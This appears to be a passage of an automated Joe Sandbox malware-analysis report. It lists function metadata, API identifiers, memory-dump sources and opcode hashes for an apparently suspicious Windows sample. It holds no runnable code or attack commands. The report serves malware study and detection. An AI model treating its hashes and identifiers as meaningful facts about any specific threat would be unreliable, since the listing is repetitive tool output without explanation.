                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParentWindowstd::ios_base::~ios_base
                                                                            • String ID:
                                                                            • API String ID: 3887031883-0
                                                                            • Opcode ID: 7cfb668fa1a89feb959b52328b2ac2b6c596761aa6dc740b9b283891b68f05ff
                                                                            • Instruction ID: d474cb4dc8cdb04678e2239305b384f8ee8e8ebb8686284264462acc162c7b1a
                                                                            • Opcode Fuzzy Hash: 7cfb668fa1a89feb959b52328b2ac2b6c596761aa6dc740b9b283891b68f05ff
                                                                            • Instruction Fuzzy Hash: B6524B36600A4087EA66EB27D8953EE63A1F789BC4F444515EF8E47BB6DF38E841C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014016009C Relevance: 7.8, APIs: 5, Instructions: 264windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ParentRedraw
                                                                            • String ID:
                                                                            • API String ID: 3493001960-0
                                                                            • Opcode ID: 9575dd3d1a55c1d9dc4051e2730fa2d99d7eb429e5d93d6c34a5483677be9026
                                                                            • Instruction ID: aa84f0df66b489b9ab9d0d5132db7110ad1b08fb615910550d34eed50c83f706
                                                                            • Opcode Fuzzy Hash: 9575dd3d1a55c1d9dc4051e2730fa2d99d7eb429e5d93d6c34a5483677be9026
                                                                            • Instruction Fuzzy Hash: 27A13B36704A9286EE16EFA798547EA63A1BB8DFC4F098436DF0E477A1DE79C441C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401724E8 Relevance: 7.8, APIs: 5, Instructions: 255COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: RectWindow$CursorLoad
                                                                            • String ID:
                                                                            • API String ID: 3444235573-0
                                                                            • Opcode ID: 29375ded6e8925bd073ffb9992306f624188040a540ba8e1c401448822a0c7d5
                                                                            • Instruction ID: 58489b30925c868ccb3a5454988bb159249b18a948cc87e681390866717db4a7
                                                                            • Opcode Fuzzy Hash: 29375ded6e8925bd073ffb9992306f624188040a540ba8e1c401448822a0c7d5
                                                                            • Instruction Fuzzy Hash: 4FC15B32600AC086EB26DF76E8647DE6760FB8DB84F444126EB9E47BA6DF78D541C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400686C8 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 478keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$AsyncEmptyState$Invert
                                                                            • String ID: (
                                                                            • API String ID: 613991215-3887548279
                                                                            • Opcode ID: ce6d6b1d5365356a31f2358a4443b04d6871da755c3c512ab86d658224c143a9
                                                                            • Instruction ID: 730a8590baf601da818039969f3e5b4258ba5727b9f07f92cde639826a362630
                                                                            • Opcode Fuzzy Hash: ce6d6b1d5365356a31f2358a4443b04d6871da755c3c512ab86d658224c143a9
                                                                            • Instruction Fuzzy Hash: 0612817630168086EA7ADB2B89547ED23A2F78CBC4F285A26EF1D477A5CF35C851C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014000E540 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _Init_thread_footer.LIBCMT ref: 000000014000E5AB
                                                                              • Part of subcall function 00000001401CB79C: EnterCriticalSection.KERNEL32(?,?,?,000000014000BDAD,?,?,?,000000014000C09E), ref: 00000001401CB7AC
                                                                              • Part of subcall function 00000001401CB79C: LeaveCriticalSection.KERNEL32(?,?,?,000000014000BDAD,?,?,?,000000014000C09E), ref: 00000001401CB7EC
                                                                            • GetProcessHeap.KERNEL32(?,?,TGenericSinkCoupler<class _com_ptr_t<class _com_IIID<struct ISBActiveProtection,&struct __s_GUID const _GUID_f4198087_be24_4537_98,0000000140200C3E), ref: 000000014000E576
                                                                            • _Init_thread_footer.LIBCMT ref: 000000014000E625
                                                                              • Part of subcall function 00000001401CB7FC: EnterCriticalSection.KERNEL32(?,?,?,000000014000BD8D,?,?,?,000000014000C09E), ref: 00000001401CB80C
                                                                            Strings
                                                                            • TGenericSinkCoupler<class _com_ptr_t<class _com_IIID<struct ISBActiveProtection,&struct __s_GUID const _GUID_f4198087_be24_4537_98, xrefs: 000000014000E540
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterInit_thread_footer$HeapLeaveProcess_onexit
                                                                            • String ID: TGenericSinkCoupler<class _com_ptr_t<class _com_IIID<struct ISBActiveProtection,&struct __s_GUID const _GUID_f4198087_be24_4537_98
                                                                            • API String ID: 3925148313-102460630
                                                                            • Opcode ID: 04d8fea5d159e5dad9b7f48ca5b4d035eec76ef149ae2b86b9fa2a505ee60cf2
                                                                            • Instruction ID: e07cadb934fc0c54caa70eb6b15e5ffc53d746895e1dec330639480a33609098
                                                                            • Opcode Fuzzy Hash: 04d8fea5d159e5dad9b7f48ca5b4d035eec76ef149ae2b86b9fa2a505ee60cf2
                                                                            • Instruction Fuzzy Hash: 7B21ED70661B4495FB06DFA2FC89BD633A8B79C766F601125D72C422F1DBB8C946C780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140112058 Relevance: 6.3, APIs: 4, Instructions: 296keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Window$EmptyState
                                                                            • String ID:
                                                                            • API String ID: 1580063985-0
                                                                            • Opcode ID: 0504ccfc04e666f185dd8aa1d20d06c6b770a0160e6858b1f43ee8b5b62ad330
                                                                            • Instruction ID: 0681e4aa45c887c2f43826025ba3ae9a0bb0e0cd54f519ae2df73e92caeb7e4b
                                                                            • Opcode Fuzzy Hash: 0504ccfc04e666f185dd8aa1d20d06c6b770a0160e6858b1f43ee8b5b62ad330
                                                                            • Instruction Fuzzy Hash: 07C11436704B8186EB1ADFA7A4943ED23A5BB4CFC4F098126DF495BB69DE38C516C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400BA1CC Relevance: 6.3, APIs: 4, Instructions: 251COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FillRect$BrushCreateSolid
                                                                            • String ID:
                                                                            • API String ID: 248659410-0
                                                                            • Opcode ID: 1a397a4f17b8dadbfbcac12e856593f5b7f75613517bfebb3d79db9e418647d0
                                                                            • Instruction ID: 9730473f39cf2b2fffa05b929faecbe20d300f53129a39c6cad425ad532a46bd
                                                                            • Opcode Fuzzy Hash: 1a397a4f17b8dadbfbcac12e856593f5b7f75613517bfebb3d79db9e418647d0
                                                                            • Instruction Fuzzy Hash: 90916D72B205518AE708DF7AC9557EC6BB5F388388F54912DEF0A9BBA4DB38C585C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014014A2E4 Relevance: 6.2, APIs: 4, Instructions: 247windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientEnableExceptionItemMessagePointsRectSendThrowwcschr
                                                                            • String ID:
                                                                            • API String ID: 1851896112-0
                                                                            • Opcode ID: 0b32fe3e28013d55605071da2486921fd7d90f90c8f0e913cba82441660e1e81
                                                                            • Instruction ID: a9e3f5588e9da3408df58008dec949ba3464fb2607e6714e7de3170b6ee19d47
                                                                            • Opcode Fuzzy Hash: 0b32fe3e28013d55605071da2486921fd7d90f90c8f0e913cba82441660e1e81
                                                                            • Instruction Fuzzy Hash: 63A15D35701AC489EB66EF27D4553ED2391BB89BD4F898422AF490BBBADF38C541C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140054158 Relevance: 6.2, APIs: 4, Instructions: 243comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionThrow$CreateInitializeInstanceVersion_invalid_parameter_noinfowcschr
                                                                            • String ID:
                                                                            • API String ID: 2209426604-0
                                                                            • Opcode ID: 0116c18c787cc68e3b9ad1e36f354afa946b0545902dc1f2610f0fb41a6b1e5e
                                                                            • Instruction ID: 29aeaa001a74a3641b2913ef4821c9d5847532b0911a440f24532ef5e29bd9d9
                                                                            • Opcode Fuzzy Hash: 0116c18c787cc68e3b9ad1e36f354afa946b0545902dc1f2610f0fb41a6b1e5e
                                                                            • Instruction Fuzzy Hash: A6B15776210BA482EB56DB66E8987DE33A4F78CB98F114126EF5D877A1EF38C541C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140126490 Relevance: 6.2, APIs: 4, Instructions: 219COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Inflate$ColorOffset
                                                                            • String ID:
                                                                            • API String ID: 3313136937-0
                                                                            • Opcode ID: 5b8148e7b59b65d7c1a1b4243661ee97e60b7fd17dc21bf8235b0f350c2fd5b7
                                                                            • Instruction ID: a9e483d7e5d0301a5a33fdccd4bebf5be58e2e9a6e7ffc3a96b1844fd7538e70
                                                                            • Opcode Fuzzy Hash: 5b8148e7b59b65d7c1a1b4243661ee97e60b7fd17dc21bf8235b0f350c2fd5b7
                                                                            • Instruction Fuzzy Hash: B5918276B14A808AE711CB76E4547DD73A0F74DB98F14422AEF4963BA5DB38C44AC740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401EFFE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocaletry_get_function
                                                                            • String ID: GetLocaleInfoEx
                                                                            • API String ID: 2200034068-2904428671
                                                                            • Opcode ID: 5ebddc3e09940bff293991a281615bd3a96bd4c256a7b4e384e9e93b565d674c
                                                                            • Instruction ID: 21db65592dc53197c1321e3961a24b297d52cbd38617d581415158c4c87d58b6
                                                                            • Opcode Fuzzy Hash: 5ebddc3e09940bff293991a281615bd3a96bd4c256a7b4e384e9e93b565d674c
                                                                            • Instruction Fuzzy Hash: E8011235704A4082E7029B57B444BDAA761A79CFD0F584025EF58177B9CE78C9458744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401E06F0 Relevance: 4.8, APIs: 3, Instructions: 328COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 1502251526-0
                                                                            • Opcode ID: 47d05f1d8eff821228637d1e71fd626d0cfd17c82c721364c3a6103bbbdf3ffc
                                                                            • Instruction ID: 7106ff34e66d0d80f8b78b3370e2f47378428cfaa34fe0f7653b059e82804e5c
                                                                            • Opcode Fuzzy Hash: 47d05f1d8eff821228637d1e71fd626d0cfd17c82c721364c3a6103bbbdf3ffc
                                                                            • Instruction Fuzzy Hash: 69C1E77271568487E736CF16F188B9EB7A1F398B94F148129DB8A43B54D739DC81CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014018C36C Relevance: 4.7, APIs: 3, Instructions: 230COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InflateRectRedrawWindow
                                                                            • String ID:
                                                                            • API String ID: 3190756164-0
                                                                            • Opcode ID: 0182a049c9c8c80f0cd8dbc833ef4394bcf85fd053704c845e3020b6ce14ded8
                                                                            • Instruction ID: b2459838e3473d746d41b0e2c8f1618776dc8ddfbaebbfa81bd47851a0409f9b
                                                                            • Opcode Fuzzy Hash: 0182a049c9c8c80f0cd8dbc833ef4394bcf85fd053704c845e3020b6ce14ded8
                                                                            • Instruction Fuzzy Hash: 0F919A33711A808AEB99DF36D5847ED77A0F348B84F18812ADB1A93765DF34E2558B00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140132500 Relevance: 4.7, APIs: 3, Instructions: 206COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: EmptyRect
                                                                            • String ID:
                                                                            • API String ID: 2270935405-0
                                                                            • Opcode ID: afffb8be2396eff35d1c53132b8e4a9ba1ab8ccbfb21e6471ad84b96a7316ff3
                                                                            • Instruction ID: 9c1524444e3b6b30a0949131dc80282ee72e38335915ddafa39ecad8abcd33b5
                                                                            • Opcode Fuzzy Hash: afffb8be2396eff35d1c53132b8e4a9ba1ab8ccbfb21e6471ad84b96a7316ff3
                                                                            • Instruction Fuzzy Hash: 93818C32715A5085FB16EB67E4503ED23A1BB9CF98F488225EF4A57BA5EF34C546C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014015E200 Relevance: 4.7, APIs: 3, Instructions: 192COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
